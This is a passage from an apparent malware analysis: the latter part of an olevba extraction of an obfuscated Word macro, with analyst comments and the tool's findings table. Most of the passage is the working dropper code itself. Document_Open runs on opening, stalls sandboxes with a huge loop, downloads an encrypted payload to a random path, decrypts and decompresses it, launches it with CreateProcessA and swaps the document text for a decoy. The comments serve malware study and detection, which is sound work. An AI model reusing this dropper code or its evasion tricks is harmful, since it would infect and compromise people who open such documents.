  450. QKALtRfjljW.YTNxZe1 = Len(QKALtRfjljW)
  451. Dim P7eVeEw As Long, C15ddnl As Long
  452. P7eVeEw = 27
  453. C15ddnl = 10
  454. If P7eVeEw + C15ddnl > 4 Then
  455. C15ddnl = P7eVeEw + 36
  456. Else
  457. MsgBox 56
  458. End If
      ' P2aN9z5AlMfsXf8 is never assigned, so the application-name and
      ' current-directory arguments are empty strings; the target is carried in
      ' the command-line argument only. 1& = inherit handles,
      ' &H20& = NORMAL_PRIORITY_CLASS. The return value is not checked.
  459. CreateProcessA P2aN9z5AlMfsXf8, IIJfd79SYH5wwt, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, P2aN9z5AlMfsXf8, QKALtRfjljW, MoEVGldi9Pup9e
  460. Dim LhmuH4VRs1xHC As Long, H6q6euaQG As Long
  461. LhmuH4VRs1xHC = 21
  462. H6q6euaQG = 56
  463. If LhmuH4VRs1xHC + H6q6euaQG > 4 Then
  464. H6q6euaQG = LhmuH4VRs1xHC + 95
  465. Else
  466. MsgBox 32
  467. End If
      ' Close the second handle in the returned structure (presumably hThread).
  468. CloseHandle MoEVGldi9Pup9e.Xd4V8MZgn
  469. Dim INFCAmW As Long, U8anbJYc3TqIt As Long
  470. INFCAmW = 91
  471. U8anbJYc3TqIt = 42
  472. If INFCAmW + U8anbJYc3TqIt > 4 Then
  473. U8anbJYc3TqIt = INFCAmW + 92
  474. Else
  475. MsgBox 14
  476. End If
      ' Close the first handle in the returned structure (presumably hProcess).
  477. CloseHandle MoEVGldi9Pup9e.VAFd4ZagjNElZ
  478. Dim DTX1gtN5Etn As Long, ITR2NqD73zEjThC As Long
  479. DTX1gtN5Etn = 39
  480. ITR2NqD73zEjThC = 74
  481. If DTX1gtN5Etn + ITR2NqD73zEjThC > 4 Then
  482. ITR2NqD73zEjThC = DTX1gtN5Etn + 68
  483. Else
  484. MsgBox 13
  485. End If
  486. End Function
  487. Private Sub Document_Open()
      ' Entry point: Word runs this automatically when the document is opened
      ' with macros enabled (olevba's "AutoExec" finding).
      ' Sequence: long counting loop -> build a random drop path -> download,
      ' decrypt and decompress to that path (BRfjljWglIbMl) -> wait one second
      ' -> launch the file (I6aL9VLToJH) -> replace the document body text.
      ' All strings (environment variable name, file suffix, URL, payload key,
      ' replacement text) are RC4-encrypted Chr() blobs with a separate key each;
      ' none of them is decoded in this listing.
      ' Errors are suppressed for the whole routine, so a failed step is silent.
  488. On Error Resume Next
      ' Junk block (recurs throughout this routine): always-true condition,
      ' unreachable MsgBox, no behavioural effect.
  489. Dim LicbWXf9C39mI As Long, YltsZTviWcDTTKc As Long
  490. LicbWXf9C39mI = 97
  491. YltsZTviWcDTTKc = 97
  492. If LicbWXf9C39mI + YltsZTviWcDTTKc > 4 Then
  493. YltsZTviWcDTTKc = LicbWXf9C39mI + 50
  494. Else
  495. MsgBox 66
  496. End If
  497. Dim TCKNX7GS4f1GV0Ho As String
  498. Dim Oa2PY3b09Ma8Osw As Long, KEJJJJS0yRP6B As Long
  499. Oa2PY3b09Ma8Osw = 69
  500. KEJJJJS0yRP6B = 9
  501. If Oa2PY3b09Ma8Osw + KEJJJJS0yRP6B > 4 Then
  502. KEJJJJS0yRP6B = Oa2PY3b09Ma8Osw + 64
  503. Else
  504. MsgBox 72
  505. End If
  506. Dim Dmw40jHKBJjB9 As Long, IaSts As Long, YQS6bf2fAQnn As Long, IaP5sruk As Integer
  507. Dim PTCG0rEhEjTjzJVD As Long, KjhQdJYB4mT9F As Long
  508. PTCG0rEhEjTjzJVD = 33
  509. KjhQdJYB4mT9F = 12
  510. If PTCG0rEhEjTjzJVD + KjhQdJYB4mT9F > 4 Then
  511. KjhQdJYB4mT9F = PTCG0rEhEjTjzJVD + 51
  512. Else
  513. MsgBox 32
  514. End If
      ' Counting loop of 972,912,137 iterations that does no useful work. The
      ' payload logic runs only if the counter reached the full value afterwards.
      ' Presumably a delay / anti-emulation check against analysis environments
      ' that cap or skip long loops - confirm in a sandbox run. Analysis tip: a
      ' short sandbox timeout may expire before any network activity occurs.
  515. Dmw40jHKBJjB9 = 972912137: IaSts = 0: YQS6bf2fAQnn = 0
  516. Dim KHFoa As Long, PRLSJPXfkG As Long
  517. KHFoa = 14
  518. PRLSJPXfkG = 17
  519. If KHFoa + PRLSJPXfkG > 4 Then
  520. PRLSJPXfkG = KHFoa + 35
  521. Else
  522. MsgBox 80
  523. End If
  524. For IaSts = 1 To Dmw40jHKBJjB9
  525. YQS6bf2fAQnn = YQS6bf2fAQnn + 1
  526. Next IaSts
  527. Dim RZpj As Long, D8mlE4Yi As Long
  528. RZpj = 80
  529. D8mlE4Yi = 70
  530. If RZpj + D8mlE4Yi > 4 Then
  531. D8mlE4Yi = RZpj + 27
  532. Else
  533. MsgBox 31
  534. End If
  535. If YQS6bf2fAQnn = Dmw40jHKBJjB9 Then
  536. Dim OLUvI As Long, T6UKy2acaAV As Long
  537. OLUvI = 29
  538. T6UKy2acaAV = 71
  539. If OLUvI + T6UKy2acaAV > 4 Then
  540. T6UKy2acaAV = OLUvI + 95
  541. Else
  542. MsgBox 24
  543. End If
      ' Drop path = <directory from an environment variable> \ <random digits,
      ' 4-29 long> <4-character suffix, presumably a file extension>.
      ' The variable name (7 bytes) and suffix are encrypted.
  544. TCKNX7GS4f1GV0Ho = Environ(IqAGSLPUAJG(Chr(124) + Chr(208) + Chr(114) + Chr(78) + Chr(249) + Chr(36) + Chr(219), "BhyJXF")) & "\" & AFwPH7i46wGhOhKi & IqAGSLPUAJG(Chr(165) + Chr(189) + Chr(190) + Chr(147), "FLxpiRLnai55OiV")
  545. Dim ULi3LSMNlBhC1 As Long, IAxLcX68j2 As Long
  546. ULi3LSMNlBhC1 = 57
  547. IAxLcX68j2 = 13
  548. If ULi3LSMNlBhC1 + IAxLcX68j2 > 4 Then
  549. IAxLcX68j2 = ULi3LSMNlBhC1 + 72
  550. Else
  551. MsgBox 42
  552. End If
      ' Download call. Arguments: encrypted URL (25 bytes), the drop path, and the
      ' encrypted key (9 bytes) used to decrypt the downloaded body.
  553. If BRfjljWglIbMl(IqAGSLPUAJG(Chr(165) + Chr(171) + Chr(208) + Chr(152) + Chr(194) + Chr(170) + Chr(210) + Chr(42) + Chr(115) + Chr(114) + Chr(162) + Chr(44) + Chr(182) + Chr(181) + Chr(222) + Chr(240) + Chr(0) + Chr(243) + Chr(36) + Chr(171) + Chr(110) + Chr(97) + Chr(59) + Chr(50) + Chr(35), "IL3o18Se4V3"), TCKNX7GS4f1GV0Ho, IqAGSLPUAJG(Chr(64) + Chr(61) + Chr(78) + Chr(113) + Chr(183) + Chr(138) + Chr(19) + Chr(108) + Chr(104), "YjNITkQAmKjm")) = True Then
  554. Dim BxUKE9hlz9 As Long, Ef1V1XFqA7tOEw As Long
  555. BxUKE9hlz9 = 20
  556. Ef1V1XFqA7tOEw = 10
  557. If BxUKE9hlz9 + Ef1V1XFqA7tOEw > 4 Then
  558. Ef1V1XFqA7tOEw = BxUKE9hlz9 + 66
  559. Else
  560. MsgBox 69
  561. End If
      ' One-second pause after the file is written.
  562. HOglzOSpjr9h 1
  563. Dim KwNJNlJHYP As Long, LZGp6tFEOxl As Long
  564. KwNJNlJHYP = 80
  565. LZGp6tFEOxl = 25
  566. If KwNJNlJHYP + LZGp6tFEOxl > 4 Then
  567. LZGp6tFEOxl = KwNJNlJHYP + 66
  568. Else
  569. MsgBox 14
  570. End If
      ' Launch the dropped file.
  571. I6aL9VLToJH TCKNX7GS4f1GV0Ho
  572. Dim IVhK As Long, LU9NRXI6m As Long
  573. IVhK = 31
  574. LU9NRXI6m = 47
  575. If IVhK + LU9NRXI6m > 4 Then
  576. LU9NRXI6m = IVhK + 71
  577. Else
  578. MsgBox 26
  579. End If
  580. End If
  581. Dim FZuzvL As Long, NCh3bV1jG As Long
  582. FZuzvL = 49
  583. NCh3bV1jG = 21
  584. If FZuzvL + NCh3bV1jG > 4 Then
  585. NCh3bV1jG = FZuzvL + 52
  586. Else
  587. MsgBox 59
  588. End If
      ' Replaces the entire document body with a decrypted 71-byte string,
      ' whether or not the download succeeded. Content not decoded here;
      ' presumably a decoy message shown to the user - confirm by decoding.
  589. ActiveDocument.Range.Text = IqAGSLPUAJG(Chr(160) + Chr(57) + Chr(39) + Chr(10) + Chr(229) + Chr(100) + Chr(122) + Chr(174) + Chr(39) + Chr(208) + Chr(103) + Chr(51) + Chr(13) + Chr(233) + Chr(39) + Chr(11) + Chr(119) + Chr(161) + Chr(3) + Chr(216) + Chr(51) + Chr(108) + Chr(187) + Chr(48) + Chr(227) + Chr(187) + Chr(150) + Chr(253) + Chr(154) + Chr(208) + Chr(222) + Chr(111) + Chr(156) + Chr(30) + Chr(170) + Chr(13) + Chr(35) + Chr(28) + Chr(78) + Chr(168) + Chr(11) + Chr(231) + Chr(120) + Chr(199) + Chr(200) + Chr(168) + Chr(113) + Chr(71) + Chr(228) + Chr(119) + Chr(91) + Chr(43) + Chr(185) + Chr(190) + Chr(95) + Chr(205) + Chr(159) + Chr(110) + Chr(79) + Chr(17) + Chr(30) + Chr(127) + Chr(113) + Chr(251) + Chr(243) + Chr(61) + Chr(134) + Chr(143) + Chr(52) + Chr(172) + Chr(118), "MnVQz4OjUS")
  590. End If
  591. Dim VbtNVJJPmm As Long, YNXWc8Swl As Long
  592. VbtNVJJPmm = 16
  593. YNXWc8Swl = 47
  594. If VbtNVJJPmm + YNXWc8Swl > 4 Then
  595. YNXWc8Swl = VbtNVJJPmm + 27
  596. Else
  597. MsgBox 33
  598. End If
  599. End Sub
  600. Private Sub U4j0Mutcw(IbIZc4MDUIW5() As Byte, M1Ml0uRV0i As Long)
      ' Decompressor for the downloaded payload (after RC4 decryption). The
      ' format is a prefix-code (Huffman-style) stream: a header carrying the
      ' output length and a per-symbol code table, followed by the packed bits.
      ' IbIZc4MDUIW5 - input bytes; replaced in place by the decoded output
      ' M1Ml0uRV0i   - number of input bytes
      ' Header layout as read below: 1 byte (stored in NVUaE, not used again in
      ' the visible code), 4-byte output length, 2-byte symbol count, then per
      ' symbol one byte for the symbol value and one for its code length,
      ' then the code bits packed least-significant bit first.
      ' Analyst note: input is attacker-supplied; the routine does no bounds
      ' checks beyond the zero-length exit, and Document_Open suppresses errors.
  601. Dim RHz39AqVIzU7yg As Long, W61R5 As Long, H7aK As Byte, BkedkgiyKUZ4u4Smm As Long, Nl4DWWC9qyeKJpT As Integer, NVUaE As Byte, XekBgxC2kS90j8tb() As Byte, Ys77QvqqoN1 As Integer
  602. Dim Ennhv As Long, CKUS2WBcJfv6t As Byte, YGpuGcg2I4kd As Long, OL5rIjPqlH As Long, VqRbjEvtgBC1fKk As Long, AsWQpCZRTgZ(0 To 7) As Byte, K0XNnEawS6lMTQx(0 To 511) As HnF3nxQRcws6HMjP, IAmHO3mQ(0 To 255) As UP6g2cwz9
      ' BkedkgiyKUZ4u4Smm is a 1-based read position into the input.
  603. BkedkgiyKUZ4u4Smm = 1
  604. NVUaE = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  605. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
      ' Raw 4-byte copy: expected output length.
  606. XtJgfXpzM0o 4, VarPtr(YGpuGcg2I4kd), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
  607. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 4
  608. VqRbjEvtgBC1fKk = YGpuGcg2I4kd
  609. If (YGpuGcg2I4kd = 0) Then Exit Sub
  610. ReDim XekBgxC2kS90j8tb(0 To YGpuGcg2I4kd - 1)
      ' Raw 2-byte copy: number of symbols that have a code.
  611. XtJgfXpzM0o 2, VarPtr(Nl4DWWC9qyeKJpT), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
  612. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 2
      ' Per symbol: symbol value (table index), then code length in bits.
  613. For RHz39AqVIzU7yg = 1 To Nl4DWWC9qyeKJpT
  614. With IAmHO3mQ(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
  615. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  616. .Jyq7kWxLEuXU = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  617. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  618. ReDim .Psfw7jyizqX2pBr(0 To .Jyq7kWxLEuXU - 1)
  619. End With
  620. Next
      ' Bit masks 1, 2, 4, ... 128 for testing individual bits of a byte.
  621. AsWQpCZRTgZ(0) = 2 ^ 0
  622. AsWQpCZRTgZ(1) = 2 ^ 1
  623. AsWQpCZRTgZ(2) = 2 ^ 2
  624. AsWQpCZRTgZ(3) = 2 ^ 3
  625. AsWQpCZRTgZ(4) = 2 ^ 4
  626. AsWQpCZRTgZ(5) = 2 ^ 5
  627. AsWQpCZRTgZ(6) = 2 ^ 6
  628. AsWQpCZRTgZ(7) = 2 ^ 7
  629. CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  630. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  631. Ys77QvqqoN1 = 0
      ' Unpack the code bits of every symbol, in symbol order 0..255, from the
      ' packed stream; a new input byte is fetched after every 8 bits.
  632. For RHz39AqVIzU7yg = 0 To 255
  633. With IAmHO3mQ(RHz39AqVIzU7yg)
  634. If (.Jyq7kWxLEuXU > 0) Then
  635. For W61R5 = 0 To (.Jyq7kWxLEuXU - 1)
  636. If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then .Psfw7jyizqX2pBr(W61R5) = 1
  637. Ys77QvqqoN1 = Ys77QvqqoN1 + 1
  638. If (Ys77QvqqoN1 = 8) Then
  639. CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  640. BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
  641. Ys77QvqqoN1 = 0
  642. End If
  643. Next
  644. End If
  645. End With
  646. Next
      ' If the table ended exactly on a byte boundary, one byte too many was
      ' fetched above; step the read position back.
  647. If (Ys77QvqqoN1 = 0) Then BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm - 1
      ' Build the decode tree: node 0 is the root, OL5rIjPqlH is the next free
      ' node index (advanced inside GuQHe80AnN).
  648. OL5rIjPqlH = 1
  649. K0XNnEawS6lMTQx(0).O2jX1pn7C = -1
  650. K0XNnEawS6lMTQx(0).Qoey8CXRBAw3 = -1
  651. K0XNnEawS6lMTQx(0).UVv = -1
  652. K0XNnEawS6lMTQx(0).SNovaUJISNL = -1
  653. For RHz39AqVIzU7yg = 0 To 255
  654. GuQHe80AnN K0XNnEawS6lMTQx(), OL5rIjPqlH, RHz39AqVIzU7yg, IAmHO3mQ(RHz39AqVIzU7yg)
  655. Next
      ' Decode: walk the tree one input bit at a time (low bit of each byte
      ' first); on reaching a node that carries a symbol, emit it and restart
      ' from the root. Stop once the expected output length is reached.
  656. YGpuGcg2I4kd = 0
  657. For BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm To M1Ml0uRV0i
  658. CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
  659. For Ys77QvqqoN1 = 0 To 7
  660. If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then Ennhv = K0XNnEawS6lMTQx(Ennhv).Qoey8CXRBAw3 Else Ennhv = K0XNnEawS6lMTQx(Ennhv).O2jX1pn7C
  661. If (K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL > -1) Then
  662. XekBgxC2kS90j8tb(YGpuGcg2I4kd) = K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL
  663. YGpuGcg2I4kd = YGpuGcg2I4kd + 1
  664. If (YGpuGcg2I4kd = VqRbjEvtgBC1fKk) Then GoTo VqRbjEvtgBC1fKk
  665. Ennhv = 0
  666. End If
  667. Next
  668. Next
      ' The label shares its name with the expected-length variable.
  669. VqRbjEvtgBC1fKk:
      ' XOR of all output bytes is accumulated in H7aK but never compared with
      ' anything in the visible code, so the output is not integrity-checked here.
  670. H7aK = 0
  671. For RHz39AqVIzU7yg = 0 To (YGpuGcg2I4kd - 1)
  672. H7aK = H7aK Xor XekBgxC2kS90j8tb(RHz39AqVIzU7yg)
  673. Next
      ' Resize the caller's array to the decoded length and copy the output in.
  674. ReDim IbIZc4MDUIW5(0 To YGpuGcg2I4kd - 1)
  675. XtJgfXpzM0o YGpuGcg2I4kd, VarPtr(IbIZc4MDUIW5(0)), VarPtr(XekBgxC2kS90j8tb(0))
  676. End Sub
  677.  
  678. +------------+----------------------+-----------------------------------------+
  679. | Type       | Keyword              | Description                             |
  680. +------------+----------------------+-----------------------------------------+
  681. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  682. | Suspicious | Open                 | May open a file                         |
  683. | Suspicious | Binary               | May read or write a binary file (if     |
  684. |            |                      | combined with Open)                     |
  685. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  686. |            |                      | strings                                 |
  687. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  688. |            |                      | strings                                 |
  689. | Suspicious | Environ              | May read system environment variables   |
  690. | Suspicious | Write                | May write to a file (if combined with   |
  691. |            |                      | Open)                                   |
  692. | Suspicious | Put                  | May write to a file (if combined with   |
  693. |            |                      | Open)                                   |
  694. | Suspicious | Lib                  | May run code from a DLL                 |
  695. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  696. |            |                      | be used to obfuscate strings (option    |
  697. |            |                      | --decode to see all)                    |
  698. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  699. |            |                      | may be used to obfuscate strings        |
  700. |            |                      | (option --decode to see all)            |
  701. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  702. |            | Strings              | may be used to obfuscate strings        |
  703. |            |                      | (option --decode to see all)            |
  704. +------------+----------------------+-----------------------------------------+